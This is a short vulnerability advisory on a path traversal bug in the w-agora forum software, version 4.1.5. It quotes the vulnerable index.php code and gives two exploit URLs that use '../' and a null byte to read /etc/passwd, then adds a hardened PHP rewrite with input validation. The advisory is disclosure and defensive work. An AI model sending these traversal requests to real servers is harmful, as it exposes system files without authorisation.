Bug in w-agora


 



   =======================
   ==Shell Security Team==
   =======================


==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovered by : Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora


The bug :
==========

index.php

        if (empty($bn)) {
# No forum selected -> default to 'site' configuration
                $site = empty($site) ? "agora" : $site;

                $cfg_file = "${cfg_dir}/site_${site}.${ext}";
                $expnd = "all";
        } else {
                $cfg_file = "${cfg_dir}/${bn}.${ext}";
        }
           

 
Exploit :
=========


index.php

http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php

http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1



Any questions :
===============

Sonyy --> Sonico60@hotmail.com
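
A hardened form of the path construction in the index.php excerpt above, added here as an example; it is not w-agora code and not the vendor's fix. The function name resolve_cfg_file, its parameters and the 64-character limit are assumptions made for illustration.

```php
<?php
// Added example: hardened construction of the config file path.
// resolve_cfg_file() is a hypothetical name, not part of w-agora.

function resolve_cfg_file(string $cfg_dir, ?string $bn, ?string $site, string $ext): string
{
    // Forum and site names end up in a file name, so accept only a strict
    // allow-list of characters: "/", ".." and NUL bytes can never match.
    $valid = '/\A[A-Za-z0-9_-]{1,64}\z/';

    if ($bn === null || $bn === '') {
        // No forum selected -> default to 'site' configuration
        $site = ($site === null || $site === '') ? 'agora' : $site;
        if (!preg_match($valid, $site)) {
            throw new InvalidArgumentException('invalid site name');
        }
        $name = "site_{$site}";
    } else {
        if (!preg_match($valid, $bn)) {
            throw new InvalidArgumentException('invalid forum name');
        }
        $name = $bn;
    }

    // Defence in depth: the resolved path must exist and stay inside $cfg_dir.
    $base = realpath($cfg_dir);
    $path = realpath("{$cfg_dir}/{$name}.{$ext}");
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('config file not found');
    }
    return $path;
}

// Constructed demonstration: a temporary config directory with one forum file.
$dir = sys_get_temp_dir() . '/cfg_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("{$dir}/fm_d1.php", "<?php // constructed sample config\n");

echo resolve_cfg_file($dir, 'fm_d1', null, 'php'), "\n";   // accepted
foreach (["../../etc/passwd\0", 'a/b', '..'] as $bad) {     // all rejected
    try {
        resolve_cfg_file($dir, $bad, null, 'php');
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The same validation applies to the "file" parameter of modules.php, which the advisory shows accepting the same kind of value.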








